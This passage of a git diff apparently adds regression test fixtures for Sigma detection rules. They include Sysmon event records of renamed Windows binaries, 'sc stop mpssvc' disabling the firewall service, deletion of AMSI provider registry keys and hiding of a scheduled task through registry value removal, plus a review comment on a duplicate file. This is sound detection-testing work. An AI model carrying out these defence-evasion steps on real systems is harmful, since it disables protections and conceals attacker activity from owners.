"C:\\Users\\Administrator\\Downloads\\testdata\\renamed-wscript.exe", + "FileVersion": "5.812.10240.16384", + "Description": "Microsoft ® Windows Based Script Host", + "Product": "Microsoft ® Windows Script Host", + "Company": "Microsoft Corporation", + "OriginalFileName": "wscript.exe", + "CommandLine": "renamed-wscript.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml
new file mode 100644
index 000000000..c0be2dd95
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml
@@ -0,0 +1,13 @@
+id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e
+ title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx
new file mode 100644
index 000000000..1cbd0fd5e
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json
new file mode 100644
index 000000000..965a92298
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:30:29.328671Z" + } + }, + "EventRecordID": 256840, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:30:29.319", + "ProcessGuid": "5AB40FD1-3EE5-68F9-3A31-000000003B02", + "ProcessId": 480, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "renamed-curl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml
new file mode 100644
index 000000000..3c18db285
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml
@@ -0,0 +1,13 @@
+id: a8016fa4-d7e0-40de-85b0-ae04f270eec5
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 7530cd3d-7671-43e3-b209-976966f6ea48
+ title: Renamed CURL.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx
new file mode 100644
index 000000000..d133234a8
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json
new file mode 100644
index 000000000..0b1521ea0
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:25:23.218638Z" + } + }, + "EventRecordID": 256757, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:25:23.215", + "ProcessGuid": "5AB40FD1-3DB3-68F9-0A31-000000003B02", + "ProcessId": 5312, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-ftp.exe", + "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", + "Description": "File Transfer Program", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "ftp.exe", + "CommandLine": "renamed-ftp.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C", + "ParentProcessGuid": "5AB40FD1-8DEB-68F7-7E01-000000003B02", + "ParentProcessId": 476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml
new file mode 100644
index 000000000..dc986bbfb
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml
@@ -0,0 +1,13 @@
+id: 280664b2-b588-40f6-8b65-280523049740
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 277a4393-446c-449a-b0ed-7fdc7795244c
+ title: Renamed FTP.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx
new file mode 100644
index 000000000..aff2198c8
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json
new file mode 100644
index 000000000..9ae6747df
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:32:00.478719Z" + } + }, + "EventRecordID": 256855, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:32:00.468", + "ProcessGuid": "5AB40FD1-3F40-68F9-4431-000000003B02", + "ProcessId": 2808, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-msdt.exe", + "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", + "Description": "Diagnostics Troubleshooting Wizard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "msdt.exe", + "CommandLine": "renamed-msdt.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml
new file mode 100644
index 000000000..39305505b
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml
@@ -0,0 +1,13 @@
+id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: bd1c6866-65fc-44b2-be51-5588fcff82b9
+ title: Renamed Msdt.EXE Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx
new file mode 100644
index 000000000..b1c5e625a
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json
new file mode 100644
index 000000000..c1b8abd09
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls
new file mode 100644
index 000000000..c1b8abd09
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
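Review bot: `81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls` is a byte-for-byte duplicate of the `.json` fixture beside it — both file headers carry the same blob id `c1b8abd09` — so it reads as an accidental save under a mistyped extension rather than an intended file. The sc_stop_service info.yml references only the `.evtx`, so nothing in this change consumes it; it should be dropped before merge. If the regression runner picks up fixture directories by extension the stray file is presumably harmless, but it still adds noise to every future diff of that directory.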
diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml
new file mode 100644
index 000000000..fafc9e989
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml
@@ -0,0 +1,13 @@
+id: 81ea361b-6e7b-417c-8f70-abd288b10c35
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1
+ title: Stop Windows Service Via Sc.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx
new file mode 100644
index 000000000..cca37ccdf
Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx differ
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json
new file mode 100644
index 000000000..a8fe4b5d1
--- /dev/null
+++ b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T00:11:12.880834Z" + } + }, + "EventRecordID": 16786799, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteKey", + "UtcTime": "2025-10-26 00:11:12.865", + "ProcessGuid": "5AA13A44-6720-68FD-3E3F-000000004002", + "ProcessId": 6016, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml new file mode 100644 index 000000000..fafa77339 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml 
@@ -0,0 +1,13 @@
+id: 1d4c1ea3-3215-451d-bde8-b64ca8e56041
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 41d1058a-aea7-4952-9293-29eaaf516465
+ title: Removal Of AMSI Provider Registry Keys
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx
new file mode 100644
index 000000000..dbc7fc03d
Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx differ
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json
new file mode 100644
index 000000000..a4f18136b
--- /dev/null
+++ b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:56:57.832430Z" + } + }, + "EventRecordID": 111828, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteKey", + "UtcTime": "2025-10-24 23:56:57.828", + "ProcessGuid": "5AA13A44-1246-68FC-781E-000000004002", + "ProcessId": 9880, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml new file mode 100644 index 000000000..58b186a13 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml @@ -0,0 +1,13 @@ +id: 3c0a5ddd-6241-4b52-9718-b12920e082ef +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55 + title: RunMRU Registry Key Deletion - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx 
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx
new file mode 100644
index 000000000..2908f6152
Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx differ
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json
new file mode 100644
index 000000000..fd997938a
--- /dev/null
+++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T00:01:59.334619Z" + } + }, + "EventRecordID": 156421, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteValue", + "UtcTime": "2025-10-25 00:01:59.330", + "ProcessGuid": "5AA13A44-1377-68FC-A61E-000000004002", + "ProcessId": 5160, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\Index", + "User": "NT AUTHORITY\\SYSTEM" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml new file mode 100644 index 000000000..f6238bca4 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml 
@@ -0,0 +1,13 @@
+id: f3670cef-9f21-4a86-901b-c28c285f3b52
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
+ title: Removal Of Index Value to Hide Schedule Task - Registry
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx
diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx
new file mode 100644
index 000000000..561d86541
Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx differ
